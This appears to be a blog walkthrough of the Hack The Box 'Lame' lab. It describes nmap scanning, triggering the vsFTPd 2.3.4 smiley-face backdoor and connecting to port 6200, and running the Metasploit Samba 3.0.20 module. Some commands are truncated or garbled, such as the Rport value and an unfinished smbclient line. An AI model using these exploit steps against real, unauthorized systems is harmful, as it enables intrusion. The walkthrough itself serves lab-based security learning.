top of page

Linux Box Lame Walkthrough 


The first step we must do is in Hack The Box look for our machine and in our VM make sure we sudo openvpn <.ovp> file and ping our target box. If the TTL is between 1-64, generally it is a Linux box. 64-128 is probably a Windows host. 128-255 is a network appliance. This isn't always the case, but generally, this can be true.


MITRE ATTACK T1595 ACTIVE SCANNING. We will(SUDO nmap -VV -Pn -sCV -p0-65535 --reason -oN  lame.nmap )this will asssume the host is active and run default scripts and do version enumeration and show the reason why certain things are block and export to a output file called lame.nmap.


T1592.002 Gather Victim Host info we see that port 21 is avaible on the port while nmap is still going we gather info. (Ftp


We then get a banner that says that it is running vsFTPd 2.3.4


We will then open searchsploit and and search vsFTPd




Search vsftpd


We can exploit this by using metasplot but if we look at the code then we can see that the code has a hard coded smile face to open in the id fiield :)


We can go back to ftp and use :). To use this we will use our  USER username:) and Pass test


We then nc 6200. when we enter id we see that nothing happens so we continue with our exploitation by looking at our scan we see that 22 is open but that isn't always the easiest to exploit so we see smb is open as well and decide to search for that


Searchsploit smb 3.0.20 and searchsplot samba 3.0.20

  1. In msf console search samba 3.0.20

  2. Use 0

  3. Options


Set Rhost


Set Rport 145




Set host our VPN from HTB


Our payload set to automatic and run


Sudo smbclient --no-pass //

Lessons Learned

The Hack The Box Lame challenge provided valuable insights into ethical hacking and exploit discovery. By leveraging MITRE attack methods, I successfully navigated the challenge using steps that included active scanning and gathering victim host information. Through careful observation and analysis of the target machine, I was able to identify vulnerabilities and potential exploits. By examining the banner response of the FTP server, I discovered the version of vsFTPd running, which led me to search for specific exploits. Using the Metasploit Framework, I configured the necessary options and executed the chosen exploits. The challenge highlighted the importance of persistence and the understanding that not all vulnerabilities directly lead to access, but they can serve as crucial steps toward achieving the ultimate goal.

bottom of page